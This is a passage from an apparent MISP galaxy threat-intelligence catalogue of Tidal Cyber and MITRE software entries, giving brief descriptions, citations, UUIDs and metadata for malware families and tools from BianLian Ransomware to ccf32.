UUID a4fb341d-8010-433f-b8f1-a8781f961435
which can be used as unique global reference for BianLian Ransomware (Backdoor)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5001 |
source | Tidal Cyber |
tags | ['35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
BianLian Ransomware (Encryptor)
This Software object represents the custom Go encryptor tool (encryptor.exe) used during intrusions conducted by the BianLian Ransomware Group.[U.S. CISA BianLian Ransomware May 2023] The tool skips encryption of files based on a hardcoded file extension exclusion list.[BianLian Ransomware Gang Gives It a Go! | [redacted]]
Internal MISP references
UUID 252f56c2-4c85-4a19-8451-371cb04c6ceb
which can be used as unique global reference for BianLian Ransomware (Encryptor)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5292 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
BISCUIT
BISCUIT is a backdoor that has been used by APT1 since as early as 2007. [Mandiant APT1]
Internal MISP references
UUID 3ad98097-2d10-4aa1-9594-7e74828a3643
which can be used as unique global reference for BISCUIT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0017 |
source | MITRE |
type | ['malware'] |
Bisonal
Bisonal is a remote access tool (RAT) that has been used by Tonto Team against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.[Unit 42 Bisonal July 2018][Talos Bisonal Mar 2020]
Internal MISP references
UUID b898816e-610f-4c2f-9045-d9f28a54ee58
which can be used as unique global reference for Bisonal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0268 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
BitPaymer
BitPaymer is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. BitPaymer uses a unique encryption key, ransom note, and contact information for each operation. BitPaymer has several indicators suggesting overlap with the Dridex malware and is often delivered via Dridex.[Crowdstrike Indrik November 2018]
Internal MISP references
UUID e7dec940-8701-4c06-9865-5b11c61c046d
which can be used as unique global reference for BitPaymer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0570 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
BITSAdmin
BITSAdmin is a command line tool used to create and manage BITS Jobs. [Microsoft BITSAdmin]
Internal MISP references
UUID 52a20d3d-1edd-4f17-87f0-b77c67d260b4
which can be used as unique global reference for BITSAdmin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0190 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '10d09438-9ea5-405d-9b3a-36d351b5a5d9', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Black Basta
Black Basta is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMware ESXi servers. Black Basta operations have included the double extortion technique, where, in addition to demanding ransom for decrypting the files of targeted organizations, the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. Black Basta affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the Black Basta RaaS operators could include current or former members of the Conti group.[Palo Alto Networks Black Basta August 2022][Deep Instinct Black Basta August 2022][Minerva Labs Black Basta May 2022][Avertium Black Basta June 2022][NCC Group Black Basta June 2022][Cyble Black Basta May 2022]
Internal MISP references
UUID 0d5b24ba-68dc-50fa-8268-3012180fe374
which can be used as unique global reference for Black Basta
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1070 |
source | MITRE |
tags | ['89c5b94b-ecf4-4d53-9b74-3465086d4565', 'd903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', '15787198-6c8b-4f79-bf50-258d55072fee', '562e535e-19f5-4d6c-81ed-ce2aec544f09', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', 'dea4388a-b1f2-4f2a-9df9-108631d0d078', '2743d495-7728-4a75-9e5f-b64854039792', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
BlackCat
BlackCat is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, BlackCat has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.[Microsoft BlackCat Jun 2022][Sophos BlackCat Jul 2022][ACSC BlackCat Apr 2022]
Internal MISP references
UUID 691369e5-ef74-5ff9-bc20-34efeb4b6c5b
which can be used as unique global reference for BlackCat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S1068 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
BLACKCOFFEE
BLACKCOFFEE is malware that has been used by several Chinese groups since at least 2013. [FireEye APT17] [FireEye Periscope March 2018]
Internal MISP references
UUID e85e2fca-9347-4448-bfc1-342f29d5d6a1
which can be used as unique global reference for BLACKCOFFEE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0069 |
source | MITRE |
type | ['malware'] |
BlackEnergy
BlackEnergy is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. [F-Secure BlackEnergy 2014]
Internal MISP references
UUID 908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f
which can be used as unique global reference for BlackEnergy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0089 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647'] |
type | ['malware'] |
BlackLotus
BlackLotus is a Unified Extensible Firmware Interface (UEFI) bootkit that enables bypass of Secure Boot, a UEFI feature that provides verification about the state of the boot chain, even on fully updated UEFI systems. It is considered the first “in-the-wild” UEFI bootkit, as it was observed for sale on underground forums in October 2022 and researchers were able to then confirm its existence. BlackLotus bypasses UEFI Secure Boot and establishes persistence by exploiting CVE-2022-21894, and after installation, it is designed to deploy a kernel driver for further persistence and an HTTP downloader, which allows communication with a command-and-control server and loading of additional user-mode or kernel-mode payloads. BlackLotus is also capable of disabling operating system security features, and some instances of the malware include a location-based check where it will terminate if the system uses a location associated with one of several Eastern European countries.[ESET BlackLotus March 01 2023]
Internal MISP references
UUID 4cd25fac-0b5d-44e2-8df1-2c7de06b4b39
which can be used as unique global reference for BlackLotus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5306 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '1a5a32ac-1db6-46b1-b72e-18bc3d776aed', 'df78b317-ce5d-423c-ac42-1e328ab27ffd', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
BlackMould
BlackMould is a web shell based on China Chopper for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by GALLIUM against telecommunication providers.[Microsoft GALLIUM December 2019]
Internal MISP references
UUID da348a51-d047-4144-9ba4-34d2ce964a11
which can be used as unique global reference for BlackMould
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0564 |
source | MITRE |
type | ['malware'] |
BlackSuit Ransomware
BlackSuit is a ransomware capable of running on Windows and Linux systems. BlackSuit is believed to be a successor to Royal, a ransomware operation which itself derives from the notorious Russia-based Conti gang. BlackSuit operations were first observed in May 2023, and although they were relatively low in number, U.S. authorities issued a warning for healthcare sector organizations due to the ransomware's suspected pedigree.[HC3 Analyst Note BlackSuit Ransomware November 2023] The number of attacks claimed by BlackSuit operators increased notably in Q2 2024.[GitHub ransomwatch]
Internal MISP references
UUID 6e200813-4379-457b-9cce-2203bed4b072
which can be used as unique global reference for BlackSuit Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'Windows'] |
software_attack_id | S5324 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
BLINDINGCAN
BLINDINGCAN is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.[US-CERT BLINDINGCAN Aug 2020][NHS UK BLINDINGCAN Aug 2020]
Internal MISP references
UUID 1af8ea81-40df-4fba-8d63-1858b8b31217
which can be used as unique global reference for BLINDINGCAN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0520 |
source | MITRE |
type | ['malware'] |
BloodHound
BloodHound is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.[GitHub Bloodhound][CrowdStrike BloodHound April 2018][FoxIT Wocao December 2019]
Internal MISP references
UUID 72658763-8077-451e-8572-38858f8cacf3
which can be used as unique global reference for BloodHound
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0521 |
source | MITRE |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
BLUELIGHT
BLUELIGHT is a remote access Trojan used by APT37 that was first observed in early 2021.[Volexity InkySquid BLUELIGHT August 2021]
Internal MISP references
UUID 3aaaaf86-638b-4a65-be18-c6e6dcdcdb97
which can be used as unique global reference for BLUELIGHT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0657 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Bonadan
Bonadan is a malicious version of OpenSSH which acts as a custom backdoor. Bonadan has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.[ESET ForSSHe December 2018]
Internal MISP references
UUID 3793db4b-f843-4cfd-89d2-ec28b62feda5
which can be used as unique global reference for Bonadan
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0486 |
source | MITRE |
type | ['malware'] |
BONDUPDATER
BONDUPDATER is a PowerShell backdoor used by OilRig. It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.[FireEye APT34 Dec 2017][Palo Alto OilRig Sep 2018]
Internal MISP references
UUID d8690218-5272-47d8-8189-35d3b518e66f
which can be used as unique global reference for BONDUPDATER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0360 |
source | MITRE |
type | ['malware'] |
BoomBox
BoomBox is a downloader responsible for executing next stage components that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]
Internal MISP references
UUID 9d393f6f-855e-4348-8a26-008174e3605a
which can be used as unique global reference for BoomBox
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0635 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
BOOSTWRITE
BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications used by FIN7.[FireEye FIN7 Oct 2019]
Internal MISP references
UUID 74a73624-d53b-4c84-a14b-8ae964fd577c
which can be used as unique global reference for BOOSTWRITE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0415 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
BOOTRASH
BOOTRASH is a Bootkit that targets Windows operating systems. It has been used by threat actors that target the financial sector.[Mandiant M Trends 2016][FireEye Bootkits][FireEye BOOTRASH SANS]
Internal MISP references
UUID d47a4753-80f5-494e-aad7-d033aaff0d6d
which can be used as unique global reference for BOOTRASH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0114 |
source | MITRE |
type | ['malware'] |
BoxCaon
BoxCaon is a Windows backdoor that was used by IndigoZebra in a 2021 spearphishing campaign against Afghan government officials. BoxCaon's name stems from similarities shared with the malware family xCaon.[Checkpoint IndigoZebra July 2021]
Internal MISP references
UUID d3e46011-3433-426c-83b3-61c2576d5f71
which can be used as unique global reference for BoxCaon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0651 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Brave Prince
Brave Prince is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to Gold Dragon, and was seen along with Gold Dragon and RunningRAT in operations surrounding the 2018 Pyeongchang Winter Olympics. [McAfee Gold Dragon]
Internal MISP references
UUID 51b27e2c-c737-4006-a657-195ea1a1f4f0
which can be used as unique global reference for Brave Prince
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0252 |
source | MITRE |
type | ['malware'] |
Briba
Briba is a trojan used by Elderwood to open a backdoor and download files on to compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Briba May 2012]
Internal MISP references
UUID 7942783c-73a7-413c-94d1-8981029a1c51
which can be used as unique global reference for Briba
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0204 |
source | MITRE |
type | ['malware'] |
Brute Ratel C4
Brute Ratel C4 is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. Brute Ratel C4 was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.[Dark Vortex Brute Ratel C4][Palo Alto Brute Ratel July 2022][MDSec Brute Ratel August 2022][SANS Brute Ratel October 2022][Trend Micro Black Basta October 2022]
Internal MISP references
UUID 23043b44-69a6-5cdf-8f60-5a68068680c7
which can be used as unique global reference for Brute Ratel C4
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1063 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
BS2005
BS2005 is malware that was used by Ke3chang in spearphishing campaigns since at least 2011. [Mandiant Operation Ke3chang November 2014]
Internal MISP references
UUID c9e773de-0213-4b64-83fb-637060c8b5ed
which can be used as unique global reference for BS2005
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0014 |
source | MITRE |
type | ['malware'] |
BUBBLEWRAP
BUBBLEWRAP is a full-featured, second-stage backdoor used by the admin@338 group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. [FireEye admin@338]
Internal MISP references
UUID 2be4e3d2-e8c5-4406-8041-2c17bdb3a547
which can be used as unique global reference for BUBBLEWRAP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0043 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
build_downer
build_downer is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID c21d3e6c-0f6d-44a8-bdd5-5b3180a641c9
which can be used as unique global reference for build_downer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0471 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Bumblebee
Bumblebee is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. Bumblebee has been linked to ransomware operations including Conti, Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.[Google EXOTIC LILY March 2022][Proofpoint Bumblebee April 2022][Symantec Bumblebee June 2022]
Internal MISP references
UUID cc155181-fb34-4aaf-b083-b7b57b140b7a
which can be used as unique global reference for Bumblebee
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1039 |
source | MITRE |
tags | ['aa983c81-e54b-49b3-b0dd-53cf950825b8', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Bundlore
Bundlore is adware written for macOS that has been in use since at least 2015. Though categorized as adware, Bundlore has many features associated with more traditional backdoors.[MacKeeper Bundlore Apr 2019]
Internal MISP references
UUID e9873bf1-9619-4c62-b4cf-1009e83de186
which can be used as unique global reference for Bundlore
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0482 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
BUSHWALK
BUSHWALK is a web shell written in Perl that was inserted into the legitimate querymanifest.cgi file on compromised Ivanti Connect Secure VPNs during Cutting Edge.[Mandiant Cutting Edge Part 2 January 2024][Mandiant Cutting Edge Part 3 February 2024]
Internal MISP references
UUID 44ed9567-2cb6-590e-b332-154557fb93f9
which can be used as unique global reference for BUSHWALK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1118 |
source | MITRE |
type | ['malware'] |
Cachedump
Cachedump is a publicly available tool that extracts cached password hashes from a system's registry. [Mandiant APT1]
Internal MISP references
UUID 7c03fb92-3cd8-4ce4-a1e0-75e47465e4bc
which can be used as unique global reference for Cachedump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0119 |
source | MITRE |
type | ['tool'] |
CACTUS Ransomware
This Software object reflects the TTPs associated with the CACTUS ransomware binary, a malware that researchers believe has been used since at least March 2023.[Kroll CACTUS Ransomware May 10 2023] Other pre- and post-exploit TTPs associated with threat actors known to deploy CACTUS can be found in the separate dedicated Group object.
Internal MISP references
UUID ad51e7c6-7d3c-4c5d-a7e2-e50afb11a0ca
which can be used as unique global reference for CACTUS Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5309 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'a2e000da-8181-4327-bacd-32013dbd3654', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
CaddyWiper
CaddyWiper is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.[ESET CaddyWiper March 2022][Cisco CaddyWiper March 2022]
Internal MISP references
UUID 62d0ddcd-790d-4d2d-9d94-276f54b40cf0
which can be used as unique global reference for CaddyWiper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0693 |
source | MITRE |
tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
Cadelspy
Cadelspy is a backdoor that has been used by APT39.[Symantec Chafer Dec 2015]
Internal MISP references
UUID c8a51b39-6906-4381-9bb4-4e9e612aa085
which can be used as unique global reference for Cadelspy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0454 |
source | MITRE |
type | ['malware'] |
CALENDAR
CALENDAR is malware used by APT1 that mimics legitimate Gmail Calendar traffic. [Mandiant APT1]
Internal MISP references
UUID ad859a79-c183-44f6-a89a-f734710672a9
which can be used as unique global reference for CALENDAR
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0025 |
source | MITRE |
type | ['malware'] |
Calisto
Calisto is a macOS Trojan that opens a backdoor on the compromised machine. Calisto is believed to have first been developed in 2016. [Securelist Calisto July 2018] [Symantec Calisto July 2018]
Internal MISP references
UUID 6b5b408c-4f9d-4137-bfb1-830d12e9736c
which can be used as unique global reference for Calisto
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0274 |
source | MITRE |
type | ['malware'] |
CallMe
CallMe is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 352ee271-89e6-4d3f-9c26-98dbab0e2986
which can be used as unique global reference for CallMe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0077 |
source | MITRE |
type | ['malware'] |
Cannon
Cannon is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. [Unit42 Cannon Nov 2018][Unit42 Sofacy Dec 2018]
Internal MISP references
UUID 790e931d-2571-496d-9f48-322774a7d482
which can be used as unique global reference for Cannon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0351 |
source | MITRE |
type | ['malware'] |
Carbanak
Carbanak is a full-featured, remote backdoor used by a group of the same name (Carbanak). It is intended for espionage, data exfiltration, and providing remote access to infected machines. [Kaspersky Carbanak] [FireEye CARBANAK June 2017]
Internal MISP references
UUID 4cb9294b-9e4c-41b9-b640-46213a01952d
which can be used as unique global reference for Carbanak
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0030 |
source | MITRE |
type | ['malware'] |
Carberp
Carberp is a credential and information stealing malware that has been active since at least 2009. Carberp's source code was leaked online in 2013, and subsequently used as the foundation for the Carbanak backdoor.[Trend Micro Carberp February 2014][Kaspersky Carbanak][RSA Carbanak November 2017]
Internal MISP references
UUID df9491fd-5e24-4548-8e21-1268dce59d1f
which can be used as unique global reference for Carberp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0484 |
source | MITRE |
type | ['malware'] |
Carbon
Carbon is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. Carbon has been selectively used by Turla to target government and foreign affairs-related organizations in Central Asia.[ESET Carbon Mar 2017][Securelist Turla Oct 2018]
Internal MISP references
UUID 61f5d19c-1da2-43d1-ab20-51eacbca71f2
which can be used as unique global reference for Carbon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0335 |
source | MITRE |
type | ['malware'] |
Cardinal RAT
Cardinal RAT is a potentially low-volume remote access trojan (RAT) observed since December 2015. Cardinal RAT is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.[PaloAlto CardinalRat Apr 2017]
Internal MISP references
UUID fa23acef-3034-43ee-9610-4fc322f0d80b
which can be used as unique global reference for Cardinal RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0348 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
CARROTBALL
CARROTBALL is an FTP downloader utility that has been in use since at least 2019. CARROTBALL has been used as a downloader to install SYSCON.[Unit 42 CARROTBAT January 2020]
Internal MISP references
UUID 84bb4068-b441-435e-8535-02a458ffd50b
which can be used as unique global reference for CARROTBALL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0465 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['tool'] |
CARROTBAT
CARROTBAT is a customized dropper that has been in use since at least 2017. CARROTBAT has been used to install SYSCON and has infrastructure overlap with KONNI.[Unit 42 CARROTBAT November 2018][Unit 42 CARROTBAT January 2020]
Internal MISP references
UUID aefa893d-fc6e-41a9-8794-2700049db9e5
which can be used as unique global reference for CARROTBAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0462 |
source | MITRE |
type | ['malware'] |
Catchamas
Catchamas is a Windows Trojan that steals information from compromised systems. [Symantec Catchamas April 2018]
Internal MISP references
UUID 04deccb5-9850-45c3-a900-5d7039a94190
which can be used as unique global reference for Catchamas
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0261 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Caterpillar WebShell
Caterpillar WebShell is a self-developed Web Shell tool created by the group Volatile Cedar.[ClearSky Lebanese Cedar Jan 2021]
Internal MISP references
UUID ee88afaa-88bc-4c20-906f-332866388549
which can be used as unique global reference for Caterpillar WebShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0572 |
source | MITRE |
tags | ['311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CC-Attack
CC-Attack is a publicly available script that automates the use of open, external proxy servers as part of denial of service flood attacks. Its use has been promoted among the members of the Killnet hacktivist collective.[Flashpoint Glossary Killnet]
Internal MISP references
UUID 7664bfa5-8477-4903-9103-1144113fca36
which can be used as unique global reference for CC-Attack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'Windows'] |
software_attack_id | S5062 |
source | Tidal Cyber |
tags | ['62bde669-3020-4682-be68-36c83b2588a4'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CCBkdr
CCBkdr is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. [Talos CCleanup 2017] [Intezer Aurora Sept 2017]
Internal MISP references
UUID 4eb0720c-7046-4ff1-adfd-ae603506e499
which can be used as unique global reference for CCBkdr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0222 |
source | MITRE |
tags | ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55'] |
type | ['malware'] |
ccf32
ccf32 is data collection malware that has been used since at least February 2019, most notably during the FunnyDream campaign; there is also a similar x64 version.[Bitdefender FunnyDream Campaign November 2020]
Internal MISP references
UUID e00c2a0c-bbe5-4eff-b0ad-b2543456a317
which can be used as unique global reference for ccf32
in MISP communities and other software using the MISP galaxy
Associated metadata
